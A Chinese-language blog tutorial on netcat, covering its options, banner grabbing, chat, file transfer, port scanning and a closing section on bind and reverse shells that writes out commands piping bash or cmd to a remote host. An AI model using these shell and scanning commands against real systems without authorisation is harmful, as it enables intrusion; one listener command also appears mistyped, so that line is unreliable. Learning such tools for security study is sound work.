nc详解

一.简介

Nc全名为Netcat,网络工具中的瑞士军刀。
主要功能为:
1.侦听模式/传输模式
2.telnet/获取banner信息
3.传输文本信息
4.传输文件/目录
5.加密传输文件
6.远程控制/木马
7.加密所有流量
8.流媒体服务器
9.远程克隆硬盘

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
-h 查看帮助信息
-d 后台模式
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, …
-e prog程序重定向,一但连接就执行[危险]
-i secs延时的间隔
-l 监听模式,用于入站连接
-L 监听模式,连接天闭后仍然继续监听,直到CTR+C
-n IP地址,不能用域名(不使用DNS反向查询IP地址的域名)
-o film记录16进制的传输
-p[空格]端口 本地端口号
-s addr 本地源地址
-r 随机本地及远程端口
-t 使用Telnet交互方式
-u UDP模式
-v 详细输出,用-vv将更详细
-w 数字 timeout延时间隔
-z 将输入,输出关掉(用于扫锚时)

二.telnet/获取banner信息

-n 参数:只接收ip,没有dns解析
-v 参数:返回详细信息
我们先来解析一下要连接的ip地址:

用nc -nv 连接目标的80端口

三.传输文本信息

-l:设置为监听模式
-p:指定一个开放的端口
用-l -p参数将目标设置为服务器,并开放一个端口等待连接

我们可以用nc进行聊天:

四.传输文件或目录

Nc可以当作一个文件传输服务器,传输文件到目标机器。传输可分为正向传输和反向传输。
正向传输:

1
2
nc -lp 444<1.py
nc -nv 1.1.1.1 444 >2.py


反向传输:

1
2
nc -lp 444>1.py
nc -nv 1.1.1.1 444<1.py


五.Nc端口扫描

nc -nvz 开启端口扫描 默认扫描tcp端口
nc -nvzu 扫描udp端口

1
2
nc -nvz 1.1.1.1 1-65535
nc -nvzu 1.1.1.1 1-1024

六.远程控制

正向控制:

1
2
nc -lp port -c bash/cmd
nc -nv ip

意思是服务器开放一个端口,当客户端连接时直接获取shell,这样在客户端就能执行服务器的命令

反向控制:

1
2
nc -ip port
nc -nv ip -c bash/cmd

意思是服务器开放一个端口,当客户端连接时直接将自己的shell给服务器端,在服务器端执行客户端命令

好久没更新了,因为最近一直按专题学习常见的漏洞,也没啥好写的,最近在学习sql注入,等写完了再一块发出来吧~

Your browser is out-of-date!

Update your browser to view this website correctly. Update my browser now

×